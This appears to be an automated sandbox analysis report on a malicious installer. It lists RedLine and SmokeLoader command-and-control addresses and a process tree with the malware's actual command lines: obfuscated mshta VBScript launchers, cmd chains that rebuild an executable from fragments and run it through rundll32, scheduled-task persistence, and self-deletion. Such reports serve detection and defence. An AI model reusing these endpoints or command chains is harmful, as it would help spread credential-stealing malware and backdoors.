Resubmissions

08-10-2021 15:07

211008-shl8xsefa9 10

08-10-2021 05:38

211008-gbvqyadce8 10

07-10-2021 18:28

211007-w4jayacge3 10

Analysis

  • max time kernel
    66s
  • max time network
    1166s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    07-10-2021 18:28

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.9MB

  • MD5

    0308d3044eda0db671c58c2a97cb3c10

  • SHA1

    1737ab616a61d35b0bde0aaad949d9894e14be9e

  • SHA256

    b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

  • SHA512

    29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e

Malware Config

Extracted

Family

redline

Botnet

media214

C2

91.121.67.60:2151

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/

rc4.i32
rc4.i32

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Arkei Stealer Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 47 IoCs
  • Sets service image path in registry 2 TTPs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks processor information in registry 2 TTPs 37 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2772
          • C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu166f9a8bbe80.exe
            Thu166f9a8bbe80.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4440
            • C:\Users\Admin\Pictures\Adobe Films\twTtfAdLpgiNh5FPj0A3Gcxc.exe
              "C:\Users\Admin\Pictures\Adobe Films\twTtfAdLpgiNh5FPj0A3Gcxc.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1336
            • C:\Users\Admin\Pictures\Adobe Films\WcVpRA6kvlzSEmdGvqjbB0Dn.exe
              "C:\Users\Admin\Pictures\Adobe Films\WcVpRA6kvlzSEmdGvqjbB0Dn.exe"
              6⤵
              • Executes dropped EXE
              PID:4928
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 276
                7⤵
                • Program crash
                PID:5336
            • C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe
              "C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe"
              6⤵
                PID:492
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\d8s_vcvLeJHz5kX3rVpv8Cot.exe" & exit
                  7⤵
                    PID:2056
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 5
                      8⤵
                      • Delays execution with timeout.exe
                      PID:5940
                • C:\Users\Admin\Pictures\Adobe Films\lBks8kf0i8is5oB59zHNckNP.exe
                  "C:\Users\Admin\Pictures\Adobe Films\lBks8kf0i8is5oB59zHNckNP.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1360
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    7⤵
                      PID:5196
                      • C:\Users\Admin\AppData\Local\Temp\fl.exe
                        "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                        8⤵
                          PID:7132
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                            9⤵
                              PID:2056
                              • C:\Windows\System32\cmd.exe
                                "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"
                                10⤵
                                  PID:6272
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\services32.exe"
                                    11⤵
                                    • Creates scheduled task(s)
                                    PID:13356
                                • C:\Windows\System32\cmd.exe
                                  "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services32.exe"
                                  10⤵
                                    PID:476
                                    • C:\Users\Admin\AppData\Roaming\services32.exe
                                      C:\Users\Admin\AppData\Roaming\services32.exe
                                      11⤵
                                        PID:4524
                                        • C:\Windows\System32\conhost.exe
                                          "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Roaming\services32.exe"
                                          12⤵
                                            PID:9152
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                              13⤵
                                                PID:9844
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\\conhost.exe" "/sihost32"
                                                  14⤵
                                                    PID:12496
                                  • C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2752
                                    • C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\w9BtWUc1JtGE8ctva5QgyyWI.exe"
                                      7⤵
                                        PID:6088
                                    • C:\Users\Admin\Pictures\Adobe Films\ht4b1kMQDJTAQUu6jtvotLZc.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\ht4b1kMQDJTAQUu6jtvotLZc.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3344
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5080
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 300
                                        7⤵
                                        • Program crash
                                        PID:5284
                                    • C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      PID:564
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                        7⤵
                                          PID:5140
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\J1q35wdLcxMrnOSriyYy5IEs.exe" ) do taskkill /f /Im "%~nxQ"
                                            8⤵
                                              PID:5328
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /Im "J1q35wdLcxMrnOSriyYy5IEs.exe"
                                                9⤵
                                                • Kills process with taskkill
                                                PID:5908
                                              • C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE
                                                ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9
                                                9⤵
                                                • Executes dropped EXE
                                                PID:5900
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                                  10⤵
                                                    PID:5240
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
                                                      11⤵
                                                        PID:1040
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
                                                      10⤵
                                                        PID:5648
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
                                                          11⤵
                                                            PID:6132
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"
                                                              12⤵
                                                                PID:2176
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                12⤵
                                                                  PID:2180
                                                                • C:\Windows\SysWOW64\control.exe
                                                                  control ..\SMD2fE1.N
                                                                  12⤵
                                                                    PID:5464
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                      13⤵
                                                                        PID:4072
                                                                        • C:\Windows\system32\RunDll32.exe
                                                                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                          14⤵
                                                                          • Executes dropped EXE
                                                                          PID:5624
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N
                                                                            15⤵
                                                                              PID:2556
                                                          • C:\Users\Admin\Pictures\Adobe Films\l08VHlGOLkq0TzbCK9JiJJtg.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\l08VHlGOLkq0TzbCK9JiJJtg.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:2292
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                              7⤵
                                                                PID:2512
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                  8⤵
                                                                    PID:2176
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /T 10 /NOBREAK
                                                                      9⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:5604
                                                              • C:\Users\Admin\Pictures\Adobe Films\_ekxTvwgZamWC0lFanNMmU5Q.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\_ekxTvwgZamWC0lFanNMmU5Q.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5072
                                                              • C:\Users\Admin\Pictures\Adobe Films\6b_vNP8cDwOVEu6IafVzBnjk.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\6b_vNP8cDwOVEu6IafVzBnjk.exe"
                                                                6⤵
                                                                  PID:5420
                                                                • C:\Users\Admin\Pictures\Adobe Films\GihaLJZGxMz9DKv2M4XNuj85.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\GihaLJZGxMz9DKv2M4XNuj85.exe"
                                                                  6⤵
                                                                    PID:5508
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 268
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      • Program crash
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:1488
                                                                  • C:\Users\Admin\Pictures\Adobe Films\OcEWcAnUdEdEvlsJaukOw_VW.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\OcEWcAnUdEdEvlsJaukOw_VW.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:5496
                                                                    • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                      "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                      7⤵
                                                                        PID:4736
                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                        7⤵
                                                                          PID:6080
                                                                        • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                                          7⤵
                                                                            PID:6036
                                                                        • C:\Users\Admin\Pictures\Adobe Films\1iJ8eO2w6hONeHtu_Lt0y0Pp.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\1iJ8eO2w6hONeHtu_Lt0y0Pp.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:5636
                                                                        • C:\Users\Admin\Pictures\Adobe Films\sMz6x2WXTbbQiIqzd_8p_K7R.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\sMz6x2WXTbbQiIqzd_8p_K7R.exe"
                                                                          6⤵
                                                                            PID:5624
                                                                          • C:\Users\Admin\Pictures\Adobe Films\rHAI58nO1XJ3oqBogfiEKfPH.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\rHAI58nO1XJ3oqBogfiEKfPH.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5616
                                                                          • C:\Users\Admin\Pictures\Adobe Films\tI0JEeYCuX6F_Dz1vYAR787H.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\tI0JEeYCuX6F_Dz1vYAR787H.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5592
                                                                          • C:\Users\Admin\Pictures\Adobe Films\KdmvzomAEKR_2M6jz2bTNhF4.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\KdmvzomAEKR_2M6jz2bTNhF4.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5584
                                                                          • C:\Users\Admin\Pictures\Adobe Films\XYvz2d7hNO61WhDcadQ_hx8G.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\XYvz2d7hNO61WhDcadQ_hx8G.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5576
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                              7⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:4552
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                              7⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:1648
                                                                            • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                                              "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                                              7⤵
                                                                                PID:908
                                                                                • C:\Users\Admin\Pictures\Adobe Films\PakmBXCVXJ5vn_jy_boeq9U9.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\PakmBXCVXJ5vn_jy_boeq9U9.exe"
                                                                                  8⤵
                                                                                    PID:5208
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"
                                                                                    8⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    PID:5044
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                      9⤵
                                                                                        PID:3328
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Pictures\Adobe Films\z2E8PvIdDUT1UN282zxROevH.exe" ) do taskkill /f -Im "%~nXw"
                                                                                          10⤵
                                                                                            PID:5404
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f -Im "z2E8PvIdDUT1UN282zxROevH.exe"
                                                                                              11⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5928
                                                                                            • C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE
                                                                                              ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
                                                                                              11⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5420
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                                12⤵
                                                                                                  PID:5628
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
                                                                                                    13⤵
                                                                                                      PID:6004
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
                                                                                                    12⤵
                                                                                                      PID:6224
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
                                                                                                        13⤵
                                                                                                          PID:6340
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                            14⤵
                                                                                                              PID:6688
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
                                                                                                              14⤵
                                                                                                                PID:6696
                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                control.exe ..\QVNGP.I
                                                                                                                14⤵
                                                                                                                  PID:6980
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                    15⤵
                                                                                                                      PID:7092
                                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                        16⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:492
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
                                                                                                                          17⤵
                                                                                                                            PID:1584
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"
                                                                                                          8⤵
                                                                                                            PID:1800
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\fL9p6edrpk8zAAMJuMAy6QyN.exe"
                                                                                                              9⤵
                                                                                                                PID:5852
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\iBdul3EEPApoZ06K3YuNVg9J.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\iBdul3EEPApoZ06K3YuNVg9J.exe"
                                                                                                              8⤵
                                                                                                                PID:5352
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe"
                                                                                                                  9⤵
                                                                                                                    PID:1500
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\tmp499C_tmp.exe
                                                                                                                      10⤵
                                                                                                                        PID:6584
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ndUpt90X_jf8ngw2fzLkzUsX.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ndUpt90X_jf8ngw2fzLkzUsX.exe"
                                                                                                                    8⤵
                                                                                                                      PID:3064
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1988
                                                                                                                        9⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4032
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\X62wPDSNMydsu_VfgkVahVPI.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\X62wPDSNMydsu_VfgkVahVPI.exe" /mixtwo
                                                                                                                      8⤵
                                                                                                                        PID:3940
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 300
                                                                                                                          9⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4288
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ciU0eOMLu8jjlu1AjtGnGJpq.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ciU0eOMLu8jjlu1AjtGnGJpq.exe"
                                                                                                                        8⤵
                                                                                                                          PID:5744
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 312
                                                                                                                            9⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5604
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\ahjDd7_w119nH9fHoO_4fNcU.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\ahjDd7_w119nH9fHoO_4fNcU.exe"
                                                                                                                          8⤵
                                                                                                                            PID:4608
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe"
                                                                                                                            8⤵
                                                                                                                              PID:5700
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-4JTJE.tmp\EWB5sHkOwNc9URy4gjPDbthG.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-4JTJE.tmp\EWB5sHkOwNc9URy4gjPDbthG.tmp" /SL5="$30260,3619787,58368,C:\Users\Admin\Pictures\Adobe Films\EWB5sHkOwNc9URy4gjPDbthG.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:1204
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:2148
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-E17VQ.tmp\lBlYR3NdMAKI0hmQ_KTahCaR.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-E17VQ.tmp\lBlYR3NdMAKI0hmQ_KTahCaR.tmp" /SL5="$402F0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\lBlYR3NdMAKI0hmQ_KTahCaR.exe"
                                                                                                                                    9⤵
